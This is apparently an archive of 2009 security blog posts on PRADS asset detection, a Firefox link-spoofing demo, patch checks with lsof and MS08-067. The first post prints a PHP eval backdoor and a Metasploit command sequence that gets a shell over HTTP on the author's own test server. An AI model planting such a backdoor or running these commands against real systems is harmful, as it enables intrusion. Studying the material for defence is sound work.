02.28.09
Posted in OpenSourceSoftware, Debian, Ubuntu, Security, Metasploit, Back|Track at 9:28 am by Edward Bjarte Fjellskål
A good firewall setup has ingress and egress filtering. On a new setup, I like to set very strict rules for incoming and outgoing traffic. Setting up a new LAMP server etc, making sure its only can connect out to the places it should need to have access too, is a good security practice. Then open port 80 for connection from the world, minus .ru and .cn etc 
So I thought…
Then egypt, from metasploit, made and presented me to the “php/shell_findsock payload”, which I think is awesome!
If you can get the LAMP server to some way execute the $shell_findsock payload, you can in many cases get a shell over the established http connection! You can also use the payload with other php exploits in the framework.
egypt states that “this payload leaves conspicuous evil-looking entries in the apache error logs”, but I did not get any on my Debian Etch test server. But on my Ubuntu intrepid, I got :
sh: Syntax error: Bad fd number
and
Invalid method in request exit
egypt also states: “The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache”
My test on a plain fresh install of Ubuntu 8.10 (Intrepid Ibex) shows that it works.
In the test case, I left my “backdoor” on the server in test.php with the code: <?php eval($_GET[’evalme’]); ?>, which would be the default for this metasploit setup.
Short version:
msf < use exploit/unix/webapp/php_eval
msf exploit(php_eval) > set PAYLOAD php/shell_findsock
msf exploit(php_eval) > set RHOST www.gamelinux.org
msf exploit(php_eval) > exploit
Screenshot:
And you thought that you where safe!
On my Debian Etch, the suhosin patch stopped the attack, but not on my Ubuntu Intrepid.
Permalink
02.19.09
Posted in Information, OpenSourceSoftware, Security, PRADS at 12:50 pm by Edward Bjarte Fjellskål
In February 2008, I drafted a document (specs) on a program that I called PPADS back then (Perl Passive Asset Detection System). The program was thought to be a Perl implementation of PADS (Passive Asset Detection System) which is a program that listens to a network and attempts to provide an up-to-date look at the hosts and services running on the network.
My main goal was to use it with Sguil instead of PADS.
In August 2008 I implemented a proof of concept, and then in September Jan Henning Thorsen polished the code, and implemented the part that loads the PADS original service signatures.
The Output was now:
(MAC address of the asset that sent the IP packet) source_ip:port -> (MAC address of the asset that is receiving the IP packet) destination_ip:port -> Service identification string
(001f3caedaa9) 87.238.45.168:80 -> (001f3b938df8) 10.10.10.123:42753 -> Apache 2.2.3 Debian
But my initial draft of my document had more… If it says Debian.. and maybe even Etch… in the service string… It might even be a Linux server So my draft also includes Operating System guessing and fingerprinting like p0f does.
Also, one can look at strings in client communication etc.:
“Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6 Ubiquity/0.1.5″
“Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6″
So client fingerprinting is also on the road map.
I had some names in my head on what to call the project… It ended up with PRADS - Passive Real-time Asset Detection System.
At the time of writing, PRADS has implemented Service Detection, and a PoC of OS fingerprinting.
I am currently working on loading the original p0f syn-fingerprints and basing the detection on that.
Why I am I doing this ?
PADS is really cool…
p0f is really cool
But they can both be more, and I don’t see a good reason for not implementing such a great thing in one combined program. (And I believe that each time you fire up another “libpcap sniffer” on your sensor, it suck juice out of your sensor, so if you use the sensor to do IPS/IDS, your total capability lowers). Also, they seem to lack active development and signature/fingerprints updates.
I am no hardcore C/C++ hacker. Perl is easy and fast And I want one agent to “rule them all”… meaning that I want one agent that will give me (and others) insight into what is going on in the network. Not 2,3,4…10…
The project is hosted on github, and people who might be interested in joining the project, are welcome
My dream right now, is to have a GUI that shows you an updated view of what clients(OS and Clients programs) and servers(OS and services) are running/beeing used on your network *right now*
Visibility is gold.
Permalink
02.11.09
Posted in Information, OpenSourceSoftware, Linux Distributions, Security, Back|Track at 3:01 pm by Edward Bjarte Fjellskål
You probably all ready know… but… Backtrack 4 Beta was released yesterday for the public…
Read more or download here.
Permalink
02.06.09
Posted in Information, OpenSourceSoftware, Security at 4:00 pm by Edward Bjarte Fjellskål
I posted this as a test on my site, to show this funky behavior in Firefox to my friends:
http://download.gamelinux.org/code/mozilla/mz.html
Its modified from MrDougs code found on Milw0rm, to be a bit more local (Norway ftw).
It looks like a link to the Norwegian web of Skandiabanken (Internet based bank), but its really not… The status bar will as well tell you that the link points to Skandiabanken.. but clicking on it, will take you to http://www.gamelinux.org/. This is just to demonstrate the bug, and not to harm anyone or any thing… Its harmless
I posted it on January 21th 2009, but still (6th of February 2009) my Firefox v3.0.5 (Ubuntu Hardy) + NoScript v1.9.0.1 is acting funky…
Don’t believe what you click!
Permalink
Posted in Information, OpenSourceSoftware, Security at 2:53 pm by Edward Bjarte Fjellskål
I recommend reading this: http://www.myfoxny.com/dpp/news/090202_FBI_Investigates_9_Million_ATM_Scam
Bullet points:
# Major Bank Compromised
# 100 compromised credit cards
# 130 different ATM machines
# 49 cities worldwide
# 30 minutes
# $9,000,000.00 stolen
# Possible leak of sensitive information used in identity theft for a potential 1.5 million customers
They only used 100 cards but they ripped off $9 million in 30 minutes!!!
What about all the sensitive information!!! Once stolen… its stolen!
Permalink
02.05.09
Posted in Information, OpenSourceSoftware, Linux Distributions, SuSE, Debian, Ubuntu, Redhat, CentOS, Security at 10:12 pm by Edward Bjarte Fjellskål
BTW: Upgrading might not be enough…
After upgrading (up2date, yum, apt, …) my Linux systems, I check with lsof to see if any processes needs a restart…
Why?
Because, running processes might still be using old libraries and binaries etc, and would need a restart to use the new ones…
So… You might be vulnerable, even if you do install security updates regularly…
On older versions of lsof, I used to issue: lsof +L1|grep DEL
This does not seem to be sufficient on newer versions of lsof… Might be a bug?
After searching the web for information for an easier or better way of doing this, I found little… I even did not find any good info on the way I am used of doing it… If you have a smarter way of checking this, I would love to hear from you…
Here are some references to what I found:
* A bugzilla thread on redhat.com. It also has a script for redhat based systems.
* Debian/Ubuntu based systems comes with debian-goodies… apt-get install debian-goodies and then you can use checkrestart. Which checks for programs that needs restart
To manually check, here are some commands you can issue, depending on your version of lsof.
# lsof -n +L | grep -w DEL | egrep -v ” (/dev|/SYSV|/tmp)”
# lsof -n | grep “path inode=”
# lsof -n +L1 | egrep -w “txt|mem” | grep -v ” /SYSV”
# lsof -n +L | grep -w DEL | egrep -v ” (/dev|/SYSV|/tmp) ”
Hope you make this check a habit after updating your servers…
Permalink
02.02.09
Posted in Information, OpenSourceSoftware, Security at 11:18 pm by Edward Bjarte Fjellskål
It just boggles me… Micro$oft released a extra ordinary security update MS08-067 October 23, 2008….
How come, that 2-3 months after, vital machines still gets infected?
Read here and here. (In Norwegian)
Some I talk to, claims that the risk of installing such a patch and having unstable servers etc, is a good reason to not patch… (Im clueless here, so please comment if you have insight to why some dont patch) In my world, not patching, is not an option…
Well, being a sysadmin for many years, I say upgrade… Do the least important machines first (or test/staging servers), moving on as you dont find any issues with the patch… Also.. If you cant trust your OS vendor…who can you trust? And install all updates, relevant or not… or else it will only come back and bite your ass…
When that said, the viruses that spread, have lots of angles to attack your machines. Brute forcing accounts, automatic updates to be even more up to date on new attack vectors, spread via portable media etc… This is not an easy task when you first get infected… so look at the risk installing the patch, and look at all the work that you have to go through cleaning all those systems… what is the cheapest… ?
To my defense, Im a sysadmin and a tax payer… so…
Nord-Trøndelag fylkeskommune and Helse Vest: Waste my tax money on being proactive.. not reactive
Permalink
